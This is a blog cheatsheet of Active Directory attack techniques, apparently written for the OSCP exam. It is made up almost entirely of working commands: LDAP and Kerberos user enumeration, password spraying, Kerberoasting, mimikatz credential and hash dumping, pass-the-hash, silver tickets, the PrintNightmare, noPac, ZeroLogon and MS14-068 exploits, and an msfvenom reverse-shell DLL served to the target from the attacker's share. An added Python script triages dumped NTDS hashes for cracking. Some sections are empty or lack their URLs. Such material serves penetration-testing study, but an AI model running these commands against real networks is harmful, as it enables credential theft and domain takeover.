Active Directory Cheatsheet

26. Apr 2022, by manu in posts

Here are some tips and tricks that got me through the AD part of my OSCP exam.

Please note that this cheatsheet is outdated. An update is in progress.

Set DNS / hosts #

Add the DC and all found clients to your /etc/hosts file so that hostnames (and Kerberos, which works by name) resolve, e.g.:

DCIP      dc1.DOMAIN      dc1
CLIENTIP  client1.DOMAIN  client1

You could also add the DC as a nameserver in /etc/resolv.conf, but that makes internet lookups slower: every query would first go to the DC and time out there before the next resolver is tried.

Get a Shell or Credentials #

DNS Recon

Use fierce↗ to check for other servers inside the AD.

fierce --domain DOMAIN --dns-servers DCIP --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

User Recon

Use windapsearch↗ to run LDAP queries. The DC often allows anonymous binds, so no password is needed.

# Query users
windapsearch -m users --dc DCIP

# Query login names
windapsearch -m users --attrs UserPrincipalName --dc DCIP | awk -F"Name:" '{print $2}' | awk '!/^$/'

# Descriptions (often contain passwords)
windapsearch -m users --attrs Description --dc DCIP

# Query all attributes for password
windapsearch -m users --full --dc DCIP | grep -i password

Use Kerbrute↗ to enumerate users (no credentials needed; it tells valid from invalid names by the KDC's pre-authentication error codes)

kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/Names/names.txt 
kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Use CrackMapExec↗ to enumerate users over a null session (the protocol name smb is mandatory)

cme smb IP -u '' -p '' --users

# Get password policy (check the lockout threshold before spraying!)
cme smb IP -u '' -p '' --pass-pol

Use username-anarchy↗ to format found names on company websites

username-anarchy -i INFILE > OUTFILE

Use cewl↗ to crawl websites for words to pack into a wordlist

cewl -d DEPTH -m MINIMUMLENGTH --with-numbers -w OUTFILE LINK
# Expand the wordlist with rules (appends digits, years, etc.) before spraying
hashcat --force INFILE -r /usr/share/hashcat/rules/best64.rule --stdout > OUTFILE

RPC Recon

# Null session; may require credentials
rpcclient -U '' -N IP
    # Inside rpcclient: printer descriptions sometimes hold passwords
    enumprinters

impacket-rpcdump IP
# Check for PrintNightmare (spooler exposes MS-RPRN or MS-PAR over RPC)
impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'

SMB Recon

Check for anonymous/open shares

smbmap -H IP
cme smb IP -u '' -p '' --shares
enum4linux IP

After Shell and/or Credentials #

Get a Shell #

Some ways to get a shell with nothing more than a valid set of credentials. The impacket exec tools need local admin rights on the target (they write to ADMIN$ or go through DCOM/WMI); impacket separates domain and user with a forward slash.

# Common
impacket-psexec 'DOMAIN/user:PASSWORD@IP' -dc-ip DCIP
impacket-smbexec 'DOMAIN/user:PASSWORD@IP' -dc-ip DCIP
impacket-wmiexec 'DOMAIN/user:PASSWORD@IP' -dc-ip DCIP

# WinRM (tcp/5985) needs to be enabled; the user must be local admin or in Remote Management Users
evil-winrm -i IP -u 'DOMAIN\user' -p 'PASSWORD'

# RDP (tcp+udp/3389) needs to be enabled; shares /home/ as a drive and the clipboard
rdesktop -d DOMAIN -u 'USER' -p 'PASSWORD' -r clipboard:PRIMARYCLIPBOARD -r disk:host=/home/ IP

# Quite rare
impacket-atexec 'DOMAIN/user:PASSWORD@IP' 'command'
impacket-dcomexec 'DOMAIN/user:PASSWORD@IP'

Check for ASREPRoast #

Lists users without Kerberos pre-authentication and requests their AS-REP (crack with hashcat -m 18200):

impacket-GetNPUsers 'DOMAIN/user:PASSWORD' -dc-ip DCIP -request -format hashcat

Check for Kerberoast #

Lists accounts with an SPN and requests a service ticket for each (crack with hashcat -m 13100):

impacket-GetUserSPNs 'DOMAIN/user:PASSWORD' -dc-ip DCIP -request

Basic PowerShell script you can run from a shell inside the AD (here filtering for accounts with an SPN, i.e. Kerberoast candidates):

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain

# Search by what: an LDAP filter, e.g. every account that has a service principal name
$Searcher.filter = "serviceprincipalname=*"

$Result = $Searcher.FindAll()

Write-Host "---------------------------"
Foreach($obj in $Result) {
    # uncomment to print all attributes
    # ForEach($prop in $obj.Properties) { $prop }
    Write-Host "[SAM Account Name]" $obj.Properties.samaccountname
    Write-Host "[User Principal Name]" $obj.Properties.userprincipalname
    Write-Host "[Service Principal Name]" $obj.Properties.serviceprincipalname
    Write-Host "---------------------------"
}

To request the ticket with PowerShell (the TGS for the SPN then sits in the current logon session's ticket cache):

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'SPN'

To request the ticket with mimikatz:

    kerberos::ask /target:SPN

Verify that the ticket is in memory with klist, then export it with mimikatz↗. Exporting your own session's tickets does not require admin or SYSTEM privileges.

    # Verify the ticket exists (cmd or PowerShell)
    klist
    # Export all cached tickets as .kirbi files into the current folder (mimikatz)
    kerberos::list /export

Transfer the ticket to Kali and crack it with kerberoast↗ (tgsrepcrack.py):

# Setup
virtualenv --python=python3 venv
source venv/bin/activate
git clone
cd kerberoast
pip3 install pyasn1

# Crack
python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi

Cracking is also possible with hashcat after converting the .kirbi with kirbi2hashcat↗ (mode 13100 = Kerberos 5 TGS-REP, etype 23):

python kirbi2hashcat.py ticket.kirbi > ticket.hashcat
hashcat --force ticket.hashcat -m 13100 /usr/share/wordlists/rockyou.txt

Check for the Big Exploits #

Apart from ZeroLogon, which is unauthenticated, these exploits only require valid domain credentials and an unpatched target.

PrintNightmare #

Check whether the spooler exposes MS-RPRN or MS-PAR over RPC:

impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'

# Terminal 1: set up the exploit and its impacket in a venv
git clone
wget -O ./impacket/
virtualenv --python=python3 impacket
source impacket/bin/activate
cd impacket
pip3 install .
pip2 install .

# Terminal 2: build the DLL payload and serve it from an SMB share
source impacket/bin/activate
cd impacket
msfvenom -p windows/shell_reverse_tcp LHOST=LISTENINGIP LPORT=LISTENINGPORT -f dll -o evil.dll
impacket-smbserver drop $(pwd) -smb2support

# Set up a listener for the reverse shell (e.g. nc -lvnp LISTENINGPORT)

# Terminal 1: make the spooler load the DLL from the share
# (EXPLOIT.py stands for the PoC script cloned above; it takes the credentials/target first, then the UNC path of the DLL)
python3 EXPLOIT.py 'DOMAIN/USER:PASSWORD@IP' '\\LISTENINGIP\drop\evil.dll'

SAM the Admin #

Exploits the sAMAccountName spoofing chain (CVE-2021-42278 / CVE-2021-42287, "noPac"): a low-privileged domain user creates a machine account, renames it to the DC's name and obtains a ticket as the DC. Needs ms-DS-MachineAccountQuota > 0 (default 10) and a DC without the November 2021 patches.

git clone
cd sam-the-admin
virtualenv venv
source venv/bin/activate
pip3 install -r requirements.txt
pip2 install -r requirements.txt

# -shell drops into a SYSTEM shell on the DC
python sam_the_admin.py 'DOMAIN/USER:PASSWORD' -dc-ip DCIP -domain-netbios NETBIOSNAME -shell

ZeroLogon #

CVE-2020-1472: unauthenticated; resets the DC machine account password to empty, after which the domain secrets can be dumped. The DC's original machine password must be restored afterwards or the DC stops working, so use it only as a last resort.

git clone
cd zerologon

goldenPAC #

MS14-068 (forged PAC) against an unpatched 2008/2012 DC: any domain user gets a TGT with Domain Admin group membership and impacket drops into a psexec shell on the DC. The DC hostname must resolve by name (see /etc/hosts above).

impacket-goldenPac 'DOMAIN/user:PASSWORD@DCHOSTNAME'

Tools #

Mimikatz #

# Hashdump
    # Elevate
    privilege::debug
    token::elevate
    # Credentials of logged-on users (requires admin/SYSTEM)
    sekurlsa::logonpasswords
    # Dump SAM
    lsadump::sam
    # Dump hashes via LSASS; on a DC this is every domain account
    lsadump::lsa /patch

# Overpass the Hash
    sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLM /run:cmd
    # In the spawned cmd: the first Kerberos-authenticated access turns the NTLM hash into a TGT
    net use \\DC

# Pass the Ticket
    # Elevate
    privilege::debug
    # Export the tickets of all logon sessions (creates .kirbi files in the current folder)
    sekurlsa::tickets /export

    # Load a ticket on another client
    kerberos::ptt ticket.kirbi

# Silver Ticket (forged service ticket signed with the service account's hash)
    # Elevate (not strictly required: /ptt injects into your own session)
    privilege::debug
    kerberos::golden /user:USER /domain:DOMAIN /sid:DOMAINSID /target:HOSTNAMETARGET /service:SPNTYPE /rc4:SERVICEHASH /ptt

Rubeus #

# Harvest TGTs (every 30 s)
.\Rubeus.exe harvest /interval:30

# Password Spray (one password against all domain users; mind the lockout policy)
.\Rubeus.exe brute /password:Password1 /noticket

# Kerberoast
.\Rubeus.exe kerberoast /outfile:ticket.hashcat
# Crack on Kali with
hashcat --force ticket.hashcat -m 13100 /usr/share/wordlists/rockyou.txt

# ASREProast (default output is john format; hashcat needs /format:hashcat)
.\Rubeus.exe asreproast /format:hashcat /outfile:hash
# Crack on Kali with
hashcat --force hash -m 18200 /usr/share/wordlists/rockyou.txt

CrackMapExec #

# Get users
cme smb IP -u USER -d DOMAIN -p PASSWORD --users
# Get shares
cme smb IP -u USER -d DOMAIN -p PASSWORD --shares
# Bruteforce / spray (every user with every password; add --no-bruteforce for line-by-line pairs and check the lockout policy first)
cme smb IP -u USERLIST -p PWLIST --continue-on-success

Bloodhound #

# Start on Kali
sudo neo4j console
bloodhound --no-sandbox

# Remotely from Kali (-ns: use the DC as nameserver)
bloodhound-python -u USER -p PASSWORD -d DOMAIN -ns DCIP -c All

# Client (on a domain-joined host); both write a zip to import into BloodHound
. .\Sharphound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
.\sharphound.exe --CollectionMethod All --Domain CONTROLLER.local --ZipFileName loot.zip

Other Techniques #

KrbRelayUp #

Local privilege escalation to SYSTEM on a domain-joined host when LDAP signing and LDAP channel binding are not enforced on the DC. The default (RBCD) method creates a computer account, so ms-DS-MachineAccountQuota must be > 0.

# Do not use cmd.exe or powershell.exe as the command: the service process runs as SYSTEM on the console desktop, not in your shell. Use a reverse-shell binary instead.
.\KrbRelayUp.exe relay -d DOMAIN -c -cn evilpc$ -cp rockyou@123
.\KrbRelayUp.exe spawn -d DOMAIN -cn evilpc$ -cp rockyou@123 -s evilservice1 -sc "evil1.exe"

# After the first two have been executed once, further SYSTEM services can be created directly
.\KrbRelayUp.exe krbscm -s evilservice2 -sc "evil1.exe"

Pass the Hash #

Works only where NTLM authentication is accepted (Kerberos-only hardening blocks it) and needs the hash of an account that is local admin on the target.

# pth-winexe wants LMHASH:NTHASH; use the empty LM hash if none is known
pth-winexe -U 'DOMAIN/USER%aad3b435b51404eeaad3b435b51404ee:NTHASH' //IP cmd
evil-winrm -i IP -u USERNAME -H NTHASH

Dump local SAM and Crack Hashes #

On Windows

# Needs Admin
reg save hklm\sam sam.out
reg save hklm\system system.out

On Kali

# samdump2 takes the SYSTEM hive first, then SAM; output is pwdump format (user:rid:lm:nt:::)
samdump2 -o hashes.txt system.out sam.out

# --username makes hashcat parse the pwdump columns; -m 1000 = NTLM
hashcat --force --username hashes.txt -m 1000 /usr/share/wordlists/rockyou.txt
john hashes.txt --format=nt --wordlist=/usr/share/wordlists/rockyou.txt

Dump the NTDS #

Grab ntds.dit together with the SYSTEM and SECURITY hives (an ntdsutil IFM export on the DC produces exactly the registry/ layout used below), copy them to Kali and extract the hashes offline:

impacket-secretsdump -ntds ntds.dit -security registry/SECURITY -system registry/SYSTEM LOCAL -pwd-last-set -user-status -history
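Before throwing a domain dump at hashcat it pays to triage it. The block below is an added example (not from the cheatsheet, samdump2 or impacket): it parses the pwdump-style lines that samdump2 and secretsdump produce, including the `_historyN` entries and the `(pwdLastSet=...) (status=...)` suffixes from the flags above, strips blank and machine-account hashes, emits `user:nthash` lines for `hashcat -m 1000 --username`, reports password reuse between accounts and joins a cracked potfile back onto user names. The sample dump is constructed (fake RIDs and hashes; `8846f7...` is the well-known NT hash of `password`).

```python
# Added example (not from the cheatsheet, samdump2 or impacket): triage a pwdump-style dump
# before cracking. Runs offline on the constructed sample below (fake RIDs and hashes,
# except 8846f7... which is the well-known NT hash of "password").
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::(?P<extra>.*)$")

# Constructed sample in secretsdump layout: history entries (-history) and the
# "(pwdLastSet=...) (status=...)" suffixes (-pwd-last-set, -user-status) included.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: (pwdLastSet=2021-12-03 09:14) (status=Enabled)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9d3f4c1c09e7bd5b3e7b8d9d7a1f0ee::: (status=Disabled)
CORP.LOCAL\\svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: (status=Enabled)
CORP.LOCAL\\jdoe:1105:aad3b435b51404eeaad3b435b51404ee:2b2ac2d1c7c8fda6e8a6f3a3c9f0e1d2::: (status=Enabled)
CORP.LOCAL\\jdoe_history0:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
CORP.LOCAL\\olduser:1106:e52cac67419a9a224a3b108f3fa6cb6d:2b2ac2d1c7c8fda6e8a6f3a3c9f0e1d2::: (status=Disabled)
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:c4f6e2a1b3d5f7a9c1e3b5d7f9a1c3e5::: (status=Enabled)
"""

def parse_dump(text: str) -> list:
    """Parse user:rid:lm:nt::: [extras] lines; banners and [*] lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        domain, _, sam = m["user"].rpartition("\\")
        hist = re.fullmatch(r"(.+)_history(\d+)", sam)
        status = re.search(r"status=(\w+)", m["extra"])
        last_set = re.search(r"pwdLastSet=([^)]+)", m["extra"])
        entries.append({
            "domain": domain,
            "user": hist.group(1) if hist else sam,
            "history": int(hist.group(2)) if hist else None,  # None = current password
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
            "machine": sam.endswith("$"),
            "status": status.group(1) if status else None,
            "pwd_last_set": last_set.group(1) if last_set else None,
        })
    return entries

def label(e: dict) -> str:
    return f"{e['user']}_history{e['history']}" if e["history"] is not None else e["user"]

def hashcat_input(entries, include_history=False, include_machines=False, include_disabled=True):
    """Lines for `hashcat -m 1000 --username`: user:nthash, blanks and duplicates removed."""
    seen, out = set(), []
    for e in entries:
        if e["history"] is not None and not include_history:
            continue
        if e["machine"] and not include_machines:
            continue  # machine passwords are 120 random characters: not crackable
        if e["status"] == "Disabled" and not include_disabled:
            continue
        if e["nt"] == EMPTY_NT or (label(e), e["nt"]) in seen:
            continue
        seen.add((label(e), e["nt"]))
        out.append(f"{label(e)}:{e['nt']}")
    return out

def reuse_report(entries) -> dict:
    """NT hash -> users whose *current* password is identical (crack one, own all of them)."""
    groups = defaultdict(set)
    for e in entries:
        if e["history"] is None and e["nt"] != EMPTY_NT:
            groups[e["nt"]].add(e["user"])
    return {h: sorted(u) for h, u in groups.items() if len(u) > 1}

def blank_passwords(entries) -> list:
    return sorted(e["user"] for e in entries if e["history"] is None and e["nt"] == EMPTY_NT)

def lm_hashes_present(entries) -> list:
    """Accounts still carrying a real LM hash (crack those with -m 3000 first, it is far weaker)."""
    return sorted(e["user"] for e in entries if e["lm"] != EMPTY_LM)

def join_cracked(entries, potfile_text: str) -> dict:
    """Map user labels to passwords using hashcat potfile lines (nthash:password)."""
    cracked = {}
    for line in potfile_text.splitlines():
        if ":" in line:
            h, _, pw = line.partition(":")
            cracked[h.strip().lower()] = pw
    return {label(e): cracked[e["nt"]] for e in entries if e["nt"] in cracked}
```

Run `hashcat_input(parse_dump(open("hashes.txt").read()))` and write the lines to a file for hashcat; afterwards `hashcat --show --username` or the potfile goes into `join_cracked()`. Two things this catches that a raw `cut -d: -f4` misses: the reuse report tells you which accounts fall together once a single hash is cracked, and the history entries give you a user's previous passwords, which are usually the pattern their current one follows.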

DC Sync Attack #


SPN Impersonate #

Constrained delegation: an account whose hash you hold is allowed to delegate to SPN, so you request a service ticket for that SPN in the name of Administrator (S4U2Self + S4U2Proxy) and use it over Kerberos. Kerberos tolerates only a few minutes of clock skew, so sync Kali's clock with the DC first.

# We need to have the same time as the DC
# Stop getting time from the VirtualBox host
sudo service virtualbox-guest-utils stop
# Update time from DC
sudo ntpdate DCIP

# -hashes takes LMHASH:NTHASH (a leading colon plus the NT hash is enough)
impacket-getST -dc-ip DCIP -spn SPN -hashes HASHFROMDOMUSER -impersonate Administrator DOM/USER
export KRB5CCNAME=Administrator.ccache

# The target must be the hostname from the SPN and resolve by name (see /etc/hosts above)
impacket-psexec -k -no-pass DOMAIN/Administrator@DC

# Revert NTP to VBox
sudo service virtualbox-guest-utils start

Show LAPS Passwords #

If an owned user has read rights on the ms-Mcs-AdmPwd attribute (LAPS admin or just LAPS reader), the local admin passwords are readable over plain LDAP; the filter returns only the computers whose attribute is visible to you:

ldapsearch -x -H ldap://DCIP -D 'USER@DOMAIN' -w 'PASSWORD' -b 'DC=DOMAIN,DC=com' '(ms-MCS-AdmPwd=*)' ms-MCS-AdmPwd